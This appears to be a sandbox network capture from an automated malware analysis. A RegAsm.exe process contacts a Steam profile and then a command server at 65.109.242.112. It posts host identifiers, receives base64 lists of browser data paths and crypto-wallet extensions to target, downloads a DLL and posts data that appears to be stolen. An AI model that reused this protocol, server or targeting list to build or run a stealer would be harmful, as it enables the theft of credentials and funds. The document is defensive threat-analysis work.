                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.017344952 CEST4434975265.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.017386913 CEST49752443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.054399014 CEST4434975265.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.054415941 CEST4434975265.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.054461956 CEST49752443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.054471016 CEST4434975265.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.054497957 CEST49752443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.054514885 CEST49752443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.086714983 CEST4434975265.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.086733103 CEST4434975265.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.086807013 CEST49752443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.086818933 CEST4434975265.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.086858034 CEST49752443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.119443893 CEST4434975265.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.119465113 CEST4434975265.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.119538069 CEST49752443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.119548082 CEST4434975265.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.119590044 CEST49752443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.143199921 CEST4434975265.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.143234968 CEST4434975265.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.143269062 CEST4434975265.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.143405914 CEST49752443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.143769026 CEST49752443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.143778086 CEST4434975265.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.170032024 CEST49753443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.170063972 CEST4434975365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.170131922 CEST49753443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.170357943 CEST49753443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.170372009 CEST4434975365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.829762936 CEST4434975365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.829837084 CEST49753443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.833000898 CEST49753443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.833009958 CEST4434975365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.833178997 CEST49753443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:30.833183050 CEST4434975365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:31.865163088 CEST4434975365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:31.865180969 CEST4434975365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:31.865194082 CEST4434975365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:31.865216017 CEST49753443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:31.865253925 CEST49753443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:31.865262985 CEST4434975365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:31.865314960 CEST49753443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.011533022 CEST4434975365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.011559963 CEST4434975365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.011730909 CEST49753443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.011739969 CEST4434975365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.011786938 CEST49753443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.244298935 CEST4434975365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.244316101 CEST4434975365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.244370937 CEST49753443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.244383097 CEST4434975365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.244422913 CEST49753443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.386209965 CEST4434975365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.386230946 CEST4434975365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.386286974 CEST49753443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.386296034 CEST4434975365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.386452913 CEST49753443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.491619110 CEST4434975365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.491660118 CEST4434975365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.491694927 CEST4434975365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.491795063 CEST49753443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.491795063 CEST49753443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.492235899 CEST49753443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.492249012 CEST4434975365.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.639605999 CEST49754443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.639642000 CEST4434975465.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:32.639704943 CEST49754443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:44.100142002 CEST49759443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:44.100152016 CEST4434975965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:44.100162029 CEST4434975965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:44.100197077 CEST49759443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:44.751997948 CEST49759443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:44.752022028 CEST4434975965.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:44.758944988 CEST49760443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:44.758992910 CEST4434976065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:44.759057999 CEST49760443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:44.759886980 CEST49760443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:44.759901047 CEST4434976065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:45.419538975 CEST4434976065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:45.419631958 CEST49760443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:45.420058966 CEST49760443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:45.420067072 CEST4434976065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:45.420268059 CEST49760443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:45.420272112 CEST4434976065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:46.516797066 CEST4434976065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:46.516865015 CEST4434976065.109.242.112192.168.2.4
                                                                                                                                                                                                                                                                May 12, 2024 12:47:46.516896009 CEST49760443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:46.516952038 CEST49760443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:46.517334938 CEST49760443192.168.2.465.109.242.112
                                                                                                                                                                                                                                                                May 12, 2024 12:47:46.517350912 CEST4434976065.109.242.112192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 12, 2024 12:46:52.229378939 CEST | 49963 | 53 | 192.168.2.4 | 1.1.1.1
May 12, 2024 12:46:52.392379999 CEST | 53 | 49963 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 12, 2024 12:46:52.229378939 CEST | 192.168.2.4 | 1.1.1.1 | 0xea63 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 12, 2024 12:46:52.392379999 CEST | 1.1.1.1 | 192.168.2.4 | 0xea63 | No error (0) | steamcommunity.com |  | 23.195.238.96 | A (IP address) | IN (0x0001) | false

• steamcommunity.com
• 65.109.242.112

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 23.195.238.96 | 443 | 2832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-12 10:46:52 UTC | 119 | OUT | GET /profiles/76561199681720597 HTTP/1.1
Host: steamcommunity.com
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-12 10:46:53 UTC | 1870 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Sun, 12 May 2024 10:46:53 GMT
Content-Length: 34771
Connection: close
Set-Cookie: sessionid=8893f98f6202e706a47b296a; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C314f2a9d7d7f8b4caec0756e81716fc0; Path=/; Secure; HttpOnly; SameSite=None
2024-05-12 10:46:53 UTC | 14514 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-05-12 10:46:53 UTC | 10062 | IN | Data Ascii: <a class="menuitem supernav" href="https://help.steampowered.com/en/">SUPPORT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': fa
2024-05-12 10:46:53 UTC | 10195 | IN | Data Ascii: &quot;,&quot;COMMUNITY_CDN_URL&quot;:&quot;https:\/\/community.akamai.steamstatic.com\/&quot;,&quot;COMMUNITY_CDN_ASSET_URL&quot;:&quot;https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/&quot;,&quot;STORE_CDN_URL&quot;:&quot;https:\/\/


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 65.109.242.112 | 443 | 2832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-12 10:46:54 UTC | 234 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
Host: 65.109.242.112
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-12 10:46:55 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 May 2024 10:46:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-12 10:46:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 65.109.242.112 | 443 | 2832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-12 10:46:55 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GHDBKFHIJKJKECAAAECA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
Host: 65.109.242.112
Content-Length: 279
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-12 10:46:55 UTC | 279 | OUT | Data Ascii: ------GHDBKFHIJKJKECAAAECAContent-Disposition: form-data; name="hwid"1B8FD0B5C1762778904926-a33c7340-61ca-11ee-8c18-806e6f6e6963------GHDBKFHIJKJKECAAAECAContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------
                                                                                                                                                                                                                                                                2024-05-12 10:46:56 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:46:56 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-05-12 10:46:56 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 62 32 33 34 63 65 31 39 31 64 39 30 37 35 39 33 32 39 36 65 65 38 38 62 36 37 39 33 61 37 65 35 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 3a1|1|1|0|b234ce191d907593296ee88b6793a7e5|1|1|1|0|0|50000|00


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.4  49733        65.109.242.112  443               2832  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp                Bytes transferred  Direction  Data
2024-05-12 10:46:57 UTC  326                OUT        POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----ECFHCGHJDBFIIDGDHIJD
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
Host: 65.109.242.112
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-12 10:46:57 UTC  331                OUT
Data Ascii: ------ECFHCGHJDBFIIDGDHIJDContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------ECFHCGHJDBFIIDGDHIJDContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------ECFHCGHJDBFIIDGDHIJDCont
2024-05-12 10:46:58 UTC  158                IN         HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 May 2024 10:46:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-12 10:46:58 UTC  1564               IN
                                                                                                                                                                                                                                                                Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.4  49734        65.109.242.112  443               2832  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp                Bytes transferred  Direction  Data
2024-05-12 10:46:59 UTC  326                OUT        POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BAEBGCFIEHCFIDGCAAFB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
Host: 65.109.242.112
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-12 10:46:59 UTC  331                OUT
Data Ascii: ------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------BAEBGCFIEHCFIDGCAAFBCont
2024-05-12 10:47:00 UTC  158                IN         HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 May 2024 10:47:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-12 10:47:00 UTC  5605               IN
                                                                                                                                                                                                                                                                Data Ascii: 15d8TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.4  49735        65.109.242.112  443               2832  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp                Bytes transferred  Direction  Data
2024-05-12 10:47:01 UTC  326                OUT        POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CAFHIJDHDGDBFHIEHDGI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
Host: 65.109.242.112
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-12 10:47:01 UTC  332                OUT
Data Ascii: ------CAFHIJDHDGDBFHIEHDGIContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------CAFHIJDHDGDBFHIEHDGIContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------CAFHIJDHDGDBFHIEHDGICont
2024-05-12 10:47:02 UTC  158                IN         HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 May 2024 10:47:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-12 10:47:02 UTC  119                IN
                                                                                                                                                                                                                                                                Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.4  49736        65.109.242.112  443               2832  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp                Bytes transferred  Direction  Data
2024-05-12 10:47:03 UTC  327                OUT        POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----ECBGCBGCAFIIECBFIDHI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
Host: 65.109.242.112
Content-Length: 7109
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-12 10:47:03 UTC  7109               OUT
Data Ascii: ------ECBGCBGCAFIIECBFIDHIContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------ECBGCBGCAFIIECBFIDHIContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------ECBGCBGCAFIIECBFIDHICont
2024-05-12 10:47:04 UTC  158                IN         HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 May 2024 10:47:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-12 10:47:04 UTC  12                 IN
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49737 | 65.109.242.112 | 443 | 2832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-12 10:47:04 UTC | 242 | OUT | GET /sqlx.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
Host: 65.109.242.112
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-12 10:47:05 UTC | 248 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 May 2024 10:47:04 GMT
Content-Type: application/octet-stream
Content-Length: 2459136
Last-Modified: Mon, 06 May 2024 07:42:12 GMT
Connection: close
ETag: "663889d4-258600"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49738 | 65.109.242.112 | 443 | 2832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-12 10:47:09 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----ECFHCGHJDBFIIDGDHIJD
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
Host: 65.109.242.112
Content-Length: 4677
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-12 10:47:09 UTC | 4677 | OUT | Data Ascii:
------ECFHCGHJDBFIIDGDHIJD
Content-Disposition: form-data; name="token"

b234ce191d907593296ee88b6793a7e5
------ECFHCGHJDBFIIDGDHIJD
Content-Disposition: form-data; name="build_id"

681a223bec180ebfdc48547d3d5bd784
------ECFHCGHJDBFIIDGDHIJD
Cont
2024-05-12 10:47:10 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 May 2024 10:47:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-12 10:47:10 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                9192.168.2.44973965.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:47:10 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----IIEBAFCBKFIDGCAKKKFC
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 1529
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:47:10 UTC1529OUTData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 33 34 63 65 31 39 31 64 39 30 37 35 39 33 32 39 36 65 65 38 38 62 36 37 39 33 61 37 65 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 38 31 61 32 32 33 62 65 63 31 38 30 65 62 66 64 63 34 38 35 34 37 64 33 64 35 62 64 37 38 34 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------IIEBAFCBKFIDGCAKKKFCContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------IIEBAFCBKFIDGCAKKKFCContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------IIEBAFCBKFIDGCAKKKFCCont
                                                                                                                                                                                                                                                                2024-05-12 10:47:11 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:11 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
2024-05-12 10:47:11 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49741 | 65.109.242.112 | 443 | 2832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-12 10:47:11 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FCAAAAFBKFIECAAKECGC
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 437
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
